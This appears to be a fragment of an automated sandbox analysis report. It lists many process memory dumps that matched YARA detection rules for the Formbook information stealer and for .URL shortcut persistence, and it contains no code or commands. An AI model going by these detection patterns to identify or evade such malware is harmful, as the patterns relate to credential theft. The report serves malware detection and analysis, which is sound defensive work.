Source: 00000008.00000003.565257536.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498814770.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589154699.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498598880.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565980818.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.566198951.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.589598221.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.498651349.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565719337.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499260635.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589004942.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588625947.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588510605.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.566332396.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499284882.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.590084354.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565331288.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588264614.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565525257.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589996765.0000000004064000.00000004.00000010.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.566048589.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.589071961.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498894184.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589736597.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588471940.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.566256167.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588426706.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565630232.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.564962472.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.499111193.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588316167.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565804356.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565037142.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589431920.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498529438.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565767361.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499217073.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565155619.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498552553.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565919206.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.498960821.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589253490.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588930070.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588694775.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.499152325.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565204523.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.499053483.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588167672.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498574791.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565378996.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
